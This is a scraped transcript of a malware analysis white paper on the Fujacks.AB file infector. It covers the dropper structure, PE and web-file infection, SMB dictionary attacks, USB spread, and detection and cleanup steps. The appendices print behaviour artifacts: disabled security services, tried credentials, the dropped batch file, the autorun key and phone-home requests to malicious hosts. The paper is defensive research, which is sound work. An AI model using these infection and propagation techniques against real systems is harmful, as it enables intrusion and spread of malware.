fujacks a modern file infector
Post on 07-Apr-2018
222 Views
Preview:
TRANSCRIPT
-
8/6/2019 Fujacks a Modern File Infector
1/20
Fujacks: A Modern File Infector
Joel Yonts
Chief Scientist
Malicious Streams
MaliciousStreams
-
8/6/2019 Fujacks a Modern File Infector
2/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
(TheManyFacesofFujacks)
1.0INTHEEARLYDAYS 3
2.0FUJACKSAMALWAREOFADIFFERENTCOLOR 32.1FIRSTIMPRESSIONS 32.2STRUCTURALANALYSIS 3Figure2.2.1:FileStructureofMaliciousSample 4Figure2.2.2:PEHeader#1ofMaliciousSample 4Figure2.2.3:PEHeader#2ofMaliciousSample 5 Figure2.2.4:FujacksInfectedFileTag 5
2.3TROJANLIKEBEHAVIOR 5Figure2.3.1:DropperTrojanInfection 6
Figure2.3.2:InternetActivityAssociatedwithMalwareInfection 7 2.4AVIRALTWIST 7Figure2.4.1:ViralReproduction 8
2.5THEWORMEMERGES 8Figure2.5.1:NetworkWormandLocalStorageReproduction 9
3.0WHYFILEINFECTORREPRODUCTION? 93.1STEADYHANDNEEDEDTOREPAIRINFECTEDFILES 10
4.0DETECTING&RESPONDINGTOFUJACKSINFECTIONS 104.1GENERALDEFENSEAGAINSTFILEINFECTORS 104.2FUJACKSSPECIFICDEFENSEANDERADICATION 11
5.0FINALTHOUGHTS 12APPENDIXA:INFECTIONARTIFACTS 13
Artifact1:ListofsecurityrelatedservicesdisabledbyFujacks 13Artifact2:APIcallsusedtolocatelocalstorageinfectiontargets 13Artifact3:DictionaryattackagainstanSMBshare 14Artifact4:FileoperationsforloadinginfectedPEintomemory 15 Artifact5:Fileoperationsfordroppingoriginal(clean)PE 15 Artifact6:Fileoperationsfordroppingtemporarybatchfile 16Artifact7:Droppedbatchfile(81$$.bat)usedtoreplace/cleaninfectedsample.exe 16Artifact8:FileoperationsfordroppingmaliciousPE 16Artifact9:Autorunkeyinstalledattheinitialstartupofncscv32.exemalware 17 Artifact10:FileoperationsoverwritinginfectiontargetwithacopyofFujacks 17Artifact11:TemporaryIconfileisusedtopreserveoriginalPEIcon 18Artifact12:OriginalPE(run.exe)isappendtonewinfectedPE 18
APPENDIXB:SAMPLEFUJACKSPEDISINFECTOR 19AppendixB:Proof-of-conceptPythonfunctionforcleaningaFujacksinfectedPE 19
-
8/6/2019 Fujacks a Modern File Infector
3/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
1.0IntheEarlyDays
Backintheearlydaysofthepersonalcomputer,theComputerVirusdominatedtheworld.
These tiny (cyber) life formsdidnt exist in the world of infectedwebsites and massiveSPAMattacks.No,theever-popularfloppywasthemediumofinfection.Spreadingfromonestudentorcolleaguetothenextthroughthesharingoftheselegacystoragedevices.Itwasntaboutstealingyourmoneyoridentityinthatday;itwasaboutmakinganameforyourself amongst your friends and the hacker community. Then the Internet grew up,moneybegan to flowacross themassive sea of inter-connected hostsand the REALbadbuyspaidattention.Weallknowthestory.Overtime,malwareauthorsfoundbetterwaysto distribute theirwares and the way of the file infecting virus largely died out untilrecently.In2007,webegantoseearebirthintheareaofFileInfectors.AtfirstglancethislookedlikeouroldfriendtheparasiticvirusbuttherehasbeenasubtlechangeintheDNAoftheseoldthreats.ThisnewbreedofmalwaretooktodaysblendedthreatandaddedtheinfectioncapabilitiesofahighlycontagiousFileInfector.
2.0FujacksAmalwareofadifferentcolor
Fast forward tomid 2007. The Fujacks family ofmalware began to climb the infectionprevalencecharts.Thisnewfamilywasactuallyfirstdiscoveredinlate2006buttheearlyvariants lacked some of the advanced reproductive behaviors that allowed Fujacks tomultiplyitsvictimsandgainintheranksofthemostinfectious.ThisreportwillfocusononeofthemoreevolvedvariantsknownasFujacks.AB.
2.1FirstImpressions
OneoftheinitialinterestingthingsInotedaboutthissampleishowmuchtheclassificationofthismalwarevariedacrossAVvendors.Evenamongstthemajorvendorssomecalledthe sample aWorm,othersaTrojan,andothers stilla Virus. AfteranalyzingthesamplepersonallyIcouldseewhytheconfusionexistedandhow,likethehorseofadifferentcolorinoz,thesampleseemedtochangebeforemyveryeyes.
2.2StructuralAnalysis
Asmanywoulddo,myfirststepinanalyzingthissampleincludedtakingalookunderthehoodandpeeringatthefilestructure,imports,andembeddedstrings.Thefilestructureprovidedthefirstsurprise.TheSectionsincludedaverylargeExtraDatsegment.
-
8/6/2019 Fujacks a Modern File Infector
4/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams 4
Figure2.2.1:FileStructureofMaliciousSample
Examining the contentsof the extra segment revealedanother PEheader. A second PEheadermostprobably indicated an embeddedPE file thatwouldlenditself toaDropperTrojanmalwarestructure.Thiswouldalsoimplyatypicaldropperreproductionthatreliesonuser interactionwithaprobable delivery throughattachments inemails andInternetdownloads.
00000000 4d5a 0000 0000 0000 0000 0000 5045 0000 MZ..........PE..00000010 4c01 0200 4653 4721 0000 0000 0000 0000 L...FSG!........00000020 e000 8f81 0b01 0000 00da 0100 0066 0000 `........Z...f..00000030 0000 0000 5401 0000 0010 0000 0c00 0000 ....T...........
Figure2.2.2:PEHeader#1ofMaliciousSample
-
8/6/2019 Fujacks a Modern File Infector
5/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
00010d40 7265 7373 0034 4238 0300 4d5a 9000 0300 ress.4B8..MZ....00010d50 0000 0400 0000 ffff 0000 b800 0000 0000 ..........8.....00010d60 0000 4000 0000 0000 0000 0000 0000 0000 ..@.............
00010d70 0000 0000 0000 0000 0000 0000 0000 0000 ................00010d80 0000 0000 0000 8000 0000 0e1f ba0e 00b4 ............:..400010d90 09cd 21b8 014c cd21 5468 6973 2070 726f .M!8.LM!This pro00010da0 6772 616d 2063 616e 6e6f 7420 6265 2072 gram cannot be r00010db0 756e 2069 6e20 444f 5320 6d6f 6465 2e0d un in DOS mode..00010dc0 0d0a 2400 0000 0000 0000 5045 0000 4c01 ..$.......PE..L
Figure2.2.3:PEHeader#2ofMaliciousSample
AnotherinterestingnotewastheexistenceofaWHBOYstringattheveryendofthefile.
Addr 0 1 2 3 4 5 6 7 8 9 A B C D E F 0 2 4 6 8 A C E
-------- ---- ---- ---- ---- ---- ---- ---- ---- ----------------0001d100 0000 0000 0000 0000 0000 0000 0000 0000 ................0001d110 0000 0000 0000 0000 0000 0000 0000 0000 ................0001d120 0000 0000 0000 0000 0000 0000 0000 0000 ................0001d130 0000 0000 0000 0000 0000 0000 0000 0000 ................0001d140 0000 0000 0000 0000 0000 0057 4842 4f59 ...........WHBOY0001d150 7275 6e2e 6578 652e 6578 6502 3530 3137 run.exe.exe.50170001d160 3601 6.
Figure2.2.4:FujacksInfectedFileTag
Thisstringandfollowingfilename/filesizecombinationturnedouttobeatagaddedbyFujacksthatcontainedtheoriginalnameandoriginalsizeoftheinfectedfile.
Examiningembeddedstringsandtheimporttablerevealedlittleofinterest.ImportswereverylightwithGetProcAddressandLoadLibrarybeingtheonlyimportedfunctions.StringswerefairlystandardwiththeonlyanomalybeingthereoccurringstringWhBoy.
2.3TrojanLikeBehavior
Takinghigh-levelstructuralanalysisandspeculationonlysofar,mynextstepwastorunthesampleinacontrolledenvironment.Uponexecution,themalwaresampleseparatedthetwoPEfilesbydroppingadisinfectedcopyofthecarrierprogramlocallyandbydroppingamalicious PE file in the%SYSTEM%/driversdirectory. At the end of this process theinfectedsamplewasdeletedandboththedisinfectedcarrierPEandthemaliciousPEwere
executed.Theendresult:theuserseestheprogramtheyexecuted(noalterationoftheuserexperience)andthemaliciousPEwasrunningsilentlyinthebackground.Furthermore,themalicious PEwas set torestarteachtime the computerrestarts tomaintain apersistentinfection.
-
8/6/2019 Fujacks a Modern File Infector
6/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
Figure2.3.1:DropperTrojanInfection
AtthispointIhadseentheanticipateddropperTrojanbehaviorandcouldunderstandtheTrojan classification. Another anticipated behavior was the Internet activity observeddirectly following the installation of the malicious PE. The exact purpose behind theInternetaccesswasnotdeterminedduringtheanalysisduetotheremotesitebeingofftheair.Fromthehttprequestitwaseasytospeculatethatadditionalmalwareoratleastanupgradeoftheexistingmalwarewastheinitialintent.
FujacksTag
sample.exe
ncscv32.exe
Heap Memory
Fujacks Tag
sample.exe
ncscv32.exe
sample.exe(infected)
Sample.exe (Infected)
* Prepended Malware PE
* Appended Infection Tag
Initial Execution1. User Execution2. Process Startup3. sample.exe loaded
into memory
Disinfect Dropper4. Original (clean) PE dropped from memory
5. Temp batch file dropped from memory6. .bat deletes sample.exe (infected)7. .bat renames sample.exe.exe (clean) to sample.exe8. .bat starts new sample.exe (clean) and deletes itself
sample.exe.exe
%TEMP%/
$$.bat
/
sample.exeUser
User
sample.exe
(clean)
%SYSTEM%/drivers/
ncscv32.exe
ncscv32.exe(fujacks)
HKEY_USERS\...\Run\ncscv32
2
1
3
Install Malware9. Malware PE dropped from memory10. Newly dropped Malware is excecuted11. Malware PE installs autorun key12. Infected sample.exe process exits
11
4
5
6
7
8
9 10
12
-
8/6/2019 Fujacks a Modern File Infector
7/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
DNSQuery:www.whboy.netDNSResponse:69.64.155.133
HTTPGetRequest:GET/update/wormcn.txtHTTP/1.1User-Agent:QQHost:www.whboy.netCache-Control:no-cache
Figure2.3.2:InternetActivityAssociatedwithMalwareInfection
2.4AViralTwist
Just asIwas readytodeclare this sample aTrojan, Inoticed itbegantomultiply! Themalicious PE was multi-threaded with several of its threads intent on spreading themaliciouscode.
First,itscannedlocalvolumeslookingforPE(exe),asp,aspx,jsp,htm,andhtmlfiles.Oncethemalwareidentifiedavictim,aninfectionprocessbegan.PEfileswerepre-pendedwithacomplete copy of the newly installed malware while web files were appended with amaliciousiframethatwouldsecretlydirectallwhoviewedthewebcontenttoamaliciousdownload site. After the infection process,manyof the PE files residingon the systembecameTrojanswiththesamelayoutasouroriginalsample.OneoddnoteaboutthePE
infectionwasonlytargetPEswithembeddediconresourceswereinfected.IbelievethistobeashortcominginthecodingofthisFujacksvariant.EarliervariantsinfectedallPEfilesbut changed all infected files to a standard icon supplied by Fujacks. The AB variantimplemented logic to preserve the original icon using temp files and a reload process.Apparentlyaddingthislogicalteredthelogicusedtoselectinfectiontargets.
Another artifact of the Fujacks infection process was the tagging of previouslyscanned/infected directories. After multiple restarts of the dropped malicious PE, Idiscovered the File Infection processwouldalways resume inthedirectorywhereit lastvisited.Knowingthispersistenceofinformationmustbemaintainedondisk,IdiscoveredtheDesktop__.inifile.ThisfilewasdroppedineachdirectoryasFujacksrecursivelyscanned
thefilesystemlookingforinfectionvictims.ThefilewassettoSystem,Hidden,andRead-onlytohideitspresencesandsimplycontainedYYYY-MM-DDofthelastscanbyFujacks.EachtimethemaliciousPEwasrestarteditwouldrecursivelyscanafilesystemandskipanydirectorythatcontainedaDesktop__.inifilewiththecurrentdate,effectivelyresumingthesystemscanfromthelastdirectoryvisited.
-
8/6/2019 Fujacks a Modern File Infector
8/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
Figure2.4.1:ViralReproduction
AtthispointIhadseenafileinfectortypereproductionthathashistoricallybeenassociatedwithacomputervirus.SoifwestoppedthestoryhereIwouldbecomfortablewiththeTrojanandVirusclassificationsbutnotnetworkWorm.
2.5TheWormEmerges
Notcontentwiththenativesoilbeingconquered,however,severalthreadsofthemaliciousPE began a systematic sweep of the local subnet looking for othermachines with SMBsharingenabled.Ifavictimwaslocated,themaliciousPEbeganalimiteddictionaryattack
against the SMB share. If the targetmachinehad anopen share orweakpassword, themaliciousPEcompromisedtheremotesystembyplacingacopyofitself(namedSetup.exe)ontheremotesystemandsettingittoautomaticallystartifauserbrowsedthetargetdrive.Tofurtherthecompromise,themaliciousPEalsobeganarecursivesweepoftheremote
FujacksTag
target.exe
ncscv32.exe
icon
Infect PE Files2. Target.exe loaded into memory
3. Icon resource of target.exe written to temp file4. Overwrite target.exe with a copy of ncsv32.exe5. Icon set to original icon using temp file6. Append file with target.exe from memory7. Append fujacks specific tag
ncscv32.exe
(fujacks)
2
1
3 4
5
6
7
2a
%TEMP%/$$.ico
target.exe
(.asp, .aspx, .jsp, .htm, .html)
.exe
%SYSTEM%/drivers/
ncscv32.exe
Heap Memory
target.exe
target.exe(Infected)
Infection Targets
1. Searches for PE, html, aspxfiles dropping Desktop__.iniin each directory
* Skips directory if desktop__.ini is
present and has current date.
Infect Web Files2a. Append infectous iframe to each file
Desktop__.ini
(System, Hidden, RO)
-
8/6/2019 Fujacks a Modern File Infector
9/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
filesystem lookingforadditionalPEandwebfiles to infectusing thesameprocessnotedabove.
A nearly identical infection process occurred for attached storage such asUSB drives &iPods.Theonlyvariationwasthename(GameSetup.exe)usedforthedroppedmaliciousPE.
Figure2.5.1:NetworkWormandLocalStorageReproduction
SonowweseethewormbehaviornotedbyseveralAVresearchers.Itiseasytoseethatthis malware species has a complicated lifecycle which explains the naming conventionconfusion.
3.0WhyFileInfectorReproduction?
AsI alluded toearlier,webeganwith the age ofthe virus, enduredthe onslaught ofthenetworkwormage,andseeminglyhavesettledintotheageoftheTrojan.IknowthingsarenotsocutanddrybutgenerallyIbelievethisclassificationoferasholdtrue.IfIcouldpointtoonethingthathasbeengoodaboutourcurrentageoftheTrojan,itisinfectionsstayput!IfaTrojangetsthroughperimeterdefensesandinfectsacorporate(orhome)usersPCthe
Network SMB Infection1a. Multiple threads search for and attack SMB shares
using basic dictionary attack2a. Drop Setup.exe & autorun.inf on remote system3a. Search & infect remote system .exe, .html, and .aspx
3a
ncscv32.exe
(fujacks)
1a
2a[NET DRIVE]:\Setup.exe
[NET DRIVE]:\Autorun.inf
Fileserver WorkstationSMB
SMB
SMB[NET DRIVE]:*\*.exe
[NET DRIVE]:*\*.html
[NET DRIVE]:*\*.aspx
Remote System
USB Devices
[DRIVE]:\GameSetup.exe
[DRIVE]:\Autorun.inf
[DRIVE]:*\*.exe
[DRIVE]:*\*.html
[DRIVE]:*\*.aspx
Local System
Attached Storage Infection
1. Multiple threads locate
attached storage
2. Drop GameSetup.exe &
autorun.inf
3. Search & infect .exe, .html,
and .aspx
1
2
3
-
8/6/2019 Fujacks a Modern File Infector
10/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
infectionwillbecontainedandonlythedataflowingthroughoraroundthismachineisatrisk. Thiswas a huge relief after the geometric reproduction of the networkwormera.However,theblendedthreatthatFujacksbringstothetablegivestheattackersthebestofmultipleworlds.Withthisattack,theycanutilizetherobustfunctionalityandstealthofaTrojan during penetration and become cyber cockroaches scurrying from one internalmachinetothenextoncetheypenetrate.ReintroducingthereproductivethreatmaybeamajorcontributortotheresurgenceinFileInfectorssuchasFujacks.
Alongthosesame lines, the proliferationofUSB thumbdrives andpersonalMP3playerssuch as iPodshavemade the USB Infectorportion of the Fujacksmalwareanattractiveaddition.Thisvectoralsopavesthewayforfuturenon-conventionaltargets.Inthenearfuture your printers, household appliances, car, etc.may be infected with a Fujacks likemalwarebecauseoftheirlocalstoragecapabilities.
One finalnote on the reproductive behavior worth highlighting is the web file infectionvector. This vectorhas far reaching potential for infection ifweb content that ishostedInternetorcorporateintranet-facingisinthepathofinfection.Allthatisrequiredisforaweb server,web content file server, orweb developer to become infectedwith Fujacksthrough one of the many infection vectors and the potential for infecting customers,businessassociates,andfriendsgreatlyincreases.
3.1SteadyHandNeededtoRepairInfectedFiles
Beyond reproductivebehavior, anothermotive for the resurgencemaybe theadditionalcomplicationandtimerequired to containandclean infection outbreaks. WithaTrojan,simplydeletingtheoffendingfileandsupportingregistrykeysmaybeenoughtoeradicatethe threat. Intheworldof file infectors, the infectionmay beattachedto yourbusinesscriticaldocuments, attachedto theweb content that provides 100%ofyour revenue,oryoursingle copyofthe termpaperdue tomorrow. Disinfecting file infectorsmostofteninvolves slicing and dicing your treasured files and removing the malicious componentswithoutharmingtheknowngoodcontent.Obviouslytheneedforaccuracyiscriticalwithlittle tolerance for error. This extra time can prolong the infection hours if not days.Whether this aspect of file infectors is a primary motive or a by-product, the attackercommunityistheonebenefiting.
4.0Detecting&RespondingtoFujacksInfections
4.1GeneralDefenseAgainstFileInfectors
Nomalwareanalysiswrite upwouldbecompletewithoutadefensesection.Allthingsconsidered,Fujacksisstillafairlyeasyfamilytoguardagainst.Thefamilydoesnotutilizeacryptographicpacker,itislightonanti-debuggingtechniques,andthefilechangesareeasy
-
8/6/2019 Fujacks a Modern File Infector
11/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
todetect.Atasummarylevel,thesamekeyelementsofdefenseagainstgeneralmalwarethreats hold true. Specifically the need for network basedanti-malware + IPS and hostbasedanti-malware+IPSformthecoredefense.Additionaltechnologyneededforaholisticdefenseinclude:
Monitoring&filteringofentrypointssuchaswww&email Networkmonitoringtoolsidentifyingtoptalkers&suspiciousflows DataLossPreventionsolutions Fileintegritymonitoring Network&hostwhite-listing
4.2FujacksSpecificDefenseandEradication
Inadditiontothesegeneraldefenseguidelines,searchingforanyoftheartifactsnotedinappendixAwouldprovideagooddetectivecontrol.
InfectionArtifacts-Detection
Presenceofanewfilein%SYSTEM%/drivernamedncscv32.exe Presenceofanunknownsystemprocessnamedncscv32 Presenceofnvscv32registryvaluesetinthe\Windows\CurrentVersion\Runkey Presenceofasystem,hidden,read-onlyfilenamedDesktop__.inilocatedin
potentiallyinfecteddirectories
Presenceofahiddeniframeassessinghttp://www.lovebak.com/qq.htmappendedtoasp,aspx,jsp,htmandhtmlfiles
PresenceofGameSetup.exeandSetup.exeonlocalstoragedevicesandnetworkshares
Unexplained$$.batand$$.icofilesinuser%TEMP%directory EmailattachmentorfiledownloadthatcontainstwoPEheaders.Somegenericanti-
malwaresignaturescandetectdoublePEsasapotentialdropperTrojan.
PEfilessuddenlygrowinginsize(approximately60K)andendingwiththefollowingASCIstringWHBOY.exe.exe.
UnexplainedSMBnetworkconnectionattemptstoothersystemsontheLAN PhoneHomehttpactivitytowww.lovebak.comand/orwww.whboy.net ManyoftheFujacksvariantschangedtheiconofallinfectedfiles.Icantexplainthis
inanyotherwayexceptsloppinessontheviruswriterspart.Thisshouldbeahugeredflagtoendusers.
-
8/6/2019 Fujacks a Modern File Infector
12/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
InfectionArtifacts-Eradication
CheckwithyourAVvendorforthelatestsignaturesanddetectionheuristics.IfyourAVCompanycurrentlydoesnthavecoverage,attempttocreateacustomersignatureandsubmitasamplefortheiranalysis.
Determinephonehome&maliciousdownloadsitesandblockthematyournetworkorhostfirewall.Inthiscasewww.lovebak.comandwww.whboy.netshouldbeblocked.
Killmaliciousprocessncscv32,deletencscv32.exefrom%SYSTEM%/driversdirectory,andremovetheautrorunvaluenvscv32from\Windows\CurrentVersion\Run.
SearchalllocalstorageanddeleteinstancesofGameSetup.exeandsupportingAutorun.infentry
SearchallnetworksharesanddeletemaliciousinstancesofSetup.exe(Usewww.virustotal.comifnecessarytoensurevalidSetup.exefilesarenotdeleted)
Ifpossible,disableopensharesandsetstrongpasswordsforremainingnetworkshares
Searchallwebfilesforthepresenceofthewww.lovebak.comandrestoringthemfromabackuporremovetheappendediframestringifinfected.
RestoreinfectedPEfilesfromabackuporcreateacustomdisinfector(AppendixB)5.0FinalThoughts
Whileresearchingclassicfileinfectors,Icameacrossonespeciesthathadasimilarinfectedfile format asFujacks. The specieswas calledW32/Sand.123000 andwas discovered in
2003.LikeFujacks,filesinfectedwithSand.12300separatetheoriginalPEandthemaliciouscode
into separate files at run time. After separation both files areexecuted, again resembling the execution of a Fujacks infectedfile. Could Sand.12300 be the inspiration for the design ofFujacks?
Regardless of its ancestry, the Fujacks family is certainly aninterestingmalwaregroup that hasa complicated reproductivecycle. Iwould still consider this almost a proof-of-concept forwhat could be a serious threat when combined with other
advanced techniques such as rootkit technology and alternatedata streams. A healthy focus from our security productproviders and incidentrespondersonhow todealwith todaysfile infectors will pay dividends and help ensure we are wellpreparedforthenextevolution.
Amoeba Infector
ProgramCode
Amoeba Virus(W32/Sand.12300)
Malicious Code(Head)
Malicious Code(Tail)
-
8/6/2019 Fujacks a Modern File Infector
13/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
AppendixA:InfectionArtifacts
Attempts to access service "Schedule".Attempts to access service "sharedaccess".Attempts to access service "RsCCenter".Attempts to access service "RsRavMon".Attempts to access service "RsCCenter".Attempts to access service "RsRavMon".Attempts to access service "KVWSC".Attempts to access service "KVSrvXP".Attempts to access service "KVWSC".Attempts to access service "KVSrvXP".Attempts to access service "kavsvc".Attempts to access service "AVP".Attempts to access service "AVP".Attempts to access service "kavsvc".
Attempts to access service "McAfeeFramework".Attempts to access service "McShield".Disables security related services.
Artifact1:ListofsecurityrelatedservicesdisabledbyFujacks
00666 0x0041D3FD=KERNEL32!GetDriveTypeA ("A:\")00667 0x0041D3FD=KERNEL32!GetDriveTypeA ("B:\")00668 0x0041D3FD=KERNEL32!GetDriveTypeA ("C:\")00669 0x0041D3FD=KERNEL32!GetDriveTypeA ("D:\")00670 0x0041D3FD=KERNEL32!GetDriveTypeA ("E:\")
00671 0x0041D3FD=KERNEL32!GetDriveTypeA ("F:\")
omitted for brevity
00685 0x0041D3FD=KERNEL32!GetDriveTypeA ("T:\")00686 0x0041D3FD=KERNEL32!GetDriveTypeA ("U:\")00687 0x0041D3FD=KERNEL32!GetDriveTypeA ("V:\")00688 0x0041D3FD=KERNEL32!GetDriveTypeA ("W:\")00689 0x0041D3FD=KERNEL32!GetDriveTypeA ("X:\")00690 0x0041D3FD=KERNEL32!GetDriveTypeA ("Y:\")00691 0x0041D3FD=KERNEL32!GetDriveTypeA ("Z:\")00692 0x7C809463=KERNEL32!Sleep (0x00000000)
Artifact2:APIcallsusedtolocatelocalstorageinfectiontargets
-
8/6/2019 Fujacks a Modern File Infector
14/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Administrator",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Administrator",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Guest",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Guest",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","admin",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","admin",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Root",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" withusername=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Root",0x00000000)0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with
username=%s and password=%s",0x201D2A20....)
0x0041CC1F=MPR!WNetCancelConnectionA ("\\10.0.0.116",0xFFFFFFFF)0x0041D10D=KERNEL32!Sleep (0x00000200)
Artifact3:DictionaryattackagainstanSMBshare
-
8/6/2019 Fujacks a Modern File Infector
15/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
ProcessName Operation Target Detailsample.exe ReadFile C:\mw\sample.exe Offset:0,Length:20,480
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe ReadFile C:\mw\sample.exe Offset:20,480,Length:20,480
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe ReadFile C:\mw\sample.exe Offset:40,960,Length:20,480
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe ReadFile C:\mw\sample.exe Offset:61,440,Length:20,480
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe ReadFile C:\mw\sample.exe Offset:81,920,Length:20,480
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe ReadFile C:\mw\sample.exe Offset:102,400,Length:16,738
sample.exe QueryStandardInformationFile
C:\mw\sample.exe AllocationSize:122,880,EndOfFile:119,138,NumberOfLinks:1,DeletePending:False,Directory:Fals
sample.exe CloseFile C:\mw\sample.exe
Artifact4:FileoperationsforloadinginfectedPEintomemory
ProcessName Operation Target Detail
sample.exe WriteFile C:\mw\sample.exe.exe Offset:0,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:128,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:128,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:256,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:256,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:384,Length:128
sample.exe WriteFile C:\mw\sample.exe.exe Offset:49,792,Length:128
sample.exe WriteFile C:\mw\sample.exe.exe Offset:49,920,Length:128sample.exe WriteFile C:\mw\sample.exe.exe Offset:50,048,Length:128sample.exe CloseFile C:\mw\sample.exe.exe **()representsrepeatingoperations
Artifact5:Fileoperationsfordroppingoriginal(clean)PE
-
8/6/2019 Fujacks a Modern File Infector
16/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
ProcessName Operation Target Detail
sample.exe WriteFile C:\DocumentsandSettings\***\LocalSettings\Temp\81$$.bat Offset:0,Length128
sample.exe WriteFile C:\DocumentsandSettings\***\LocalSettings\Temp\81$$.bat Offset:128,Length:43
sample.exe WriteFile C:\DocumentsandSettings\***\LocalSettings\Temp\81$$.bat Offset:128,Length:43
sample.exe CloseFile C:\DocumentsandSettings\***\LocalSettings\Temp\81$$.bat
Artifact6:Fileoperationsfordroppingtemporarybatchfile
try1del "C:\mw\sample.exe"if exist "C:\mw\sample.exe" goto try1ren "C:\mw\sample.exe.exe" "run.exe"if exist "C:\mw\sample.exe.exe" goto try2"C:\mw\sample.exe":try2del %0
Artifact7:Droppedbatchfile(81$$.bat)usedtoreplace/cleaninfectedsample.exe
Process
Name Operation Target Detailsample.exe WriteFile C:\WINDOWS\system32\drivers\ncscv32.exe
Offset:0,Length:128
sample.exe WriteFile C:\WINDOWS\system32\drivers\ncscv32.exe
Offset:128,Length:128
sample.exe WriteFile C:\WINDOWS\system32
\drivers\ncscv32.exeOffset:68,608,Length:128
sample.exe WriteFile C:\WINDOWS\system32\drivers\ncscv32.exe
Offset:68,736,Length:128
sample.exe WriteFile C:\WINDOWS\system32\drivers\ncscv32.exe
Offset:68,864,Length:74
sample.exe CloseFile C:\WINDOWS\system32\drivers\ncscv32.exe
**()representsrepeatingoperations
Artifact8:FileoperationsfordroppingmaliciousPE
-
8/6/2019 Fujacks a Modern File Infector
17/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
RegistryKeyModifications:
Key Name: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunClass Name: Last Write Time: 9/18/2008 - 10:07 AMValue 0
Name: nvscv32Type: REG_SZData: C:\WINDOWS\system32\drivers\ncscv32.exe
Artifact9:Autorunkeyinstalledattheinitialstartupofncscv32.exemalware
Artifact10:FileoperationsoverwritinginfectiontargetwithacopyofFujacks
ProcessName Operation Target Detail
ncscv32.exe QueryStandardInformationFile
C:\WINDOWS\system32\drivers\ncscv32.exe
AllocationSize:69,632,EndOfFile:68,938,NumberOfLinks:1,DeletePending:False,Directory:False
ncscv32.exe WriteFile C:\cygwin\bin\run.exe Offset:0,Length:65,536
ncscv32.exe WriteFile C:\cygwin\bin\run.exe Offset:65,536,Length:3,402
ncscv32.exe SetBasicInformationFile
C:\cygwin\bin\run.exe CreationTime:0,LastAccessTime:0,LastWriteTime:9/24/20089:59:17AM,ChangeTime:9/25/20087:40:47AM,FileAttributes:n/a
ncscv32.exe CloseFile C:\WINDOWS\system32\dr
ivers\ncscv32.exe
ncscv32.exe CloseFile C:\cygwin\bin\run.exe
-
8/6/2019 Fujacks a Modern File Infector
18/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
ProcessName Operation Target Detail
ncscv32.exe CreateFile C:\DocumentsandSettings\***\LocalSettings\Temp\94$$.Ico
DesiredAccess:GenericRead,Disposition:Open,Options:SynchronousIONon-Alert,Non-DirectoryFile,Attributes:N,ShareMode:Read,Write,AllocationSize:n/a,OpenResult:Opened
ncscv32.exe QueryStandardInformationFile
C:\DocumentsandSettings\***\LocalSettings\Temp\94$$.Ico
